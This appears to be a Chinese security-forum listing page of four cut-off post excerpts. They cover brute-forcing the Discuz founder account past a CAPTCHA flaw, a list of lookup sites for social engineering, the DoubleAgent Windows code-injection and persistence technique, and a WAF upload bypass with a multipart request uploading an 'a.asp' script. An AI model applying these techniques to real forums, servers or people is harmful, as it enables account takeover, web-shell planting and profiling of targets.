Dz论坛创始人无视验证码爆破

众所皆知,Dz论坛有一个创始人账号,它长这样  只要知道了账号密码,就相当于拿下了论坛,可以为所欲为了。对于这种重要的东西,一直都是黑客们想要的东西,而对付它的好办法除了社工就是爆破了。社工不是我们这个帖子的目的,我们就开始讲爆破。而一般的爆破在验证码下显得那么无力,爆破的前提就是没有验证码和密码输错,还有知道账号的限制,这里只有没有密码输错限制,还有默认的账号名,了个验证码当阻碍,但是我们发现了一个小问题。导致这个验证码被无视掉,直接进行爆破。这个漏洞的发现者是JJ Fly,乌云漏洞

最强社工必备查询网址汇总

一、查企业查信用1、信用中国查询内容:工商注册企业和个人、行政许可和处罚网址:creditchina.gov.cn/2、全国企业信用信息公示查询内容:全国企业工商登记注册信息gsxt.saic.gov.cn/(导航)gsxt.saic.gov.cn/zjgs/(总局)3、信用导航creditchina.gov.cn/toNa4、企信宝qixin.com/5、企业信用信息查询APPixy360.com/6、企查查qichacha.com/7、企业云数据征信中心xinyong12315.com/8、

DoubleAgent技术:任意进程下代码注入与权限维持

概述本文披露一种全新的0day技术,用于代码注入和权限维持。影响范围Windows的所有版本(windows xp到windows 10)所有windows架构(x86和x64)Windows所有权限(system/administrator)每个目标进程,包括特权进程(OS/Antivirus等)DoubeleAgent所利用的是一个未被windows公开的技术,该技术已经存在了15年,所以目前没有相对应的补丁。代码注入攻击者可以利用DoubeleAgent将任意代码注入到任何一个他想注入的进

上传绕过WAF

默认状态[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7DContent-Disposition: form-data; name="filepath"; filename="a.asp"Content-Type: text/html[/mw_shl_code]突破0[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7DCon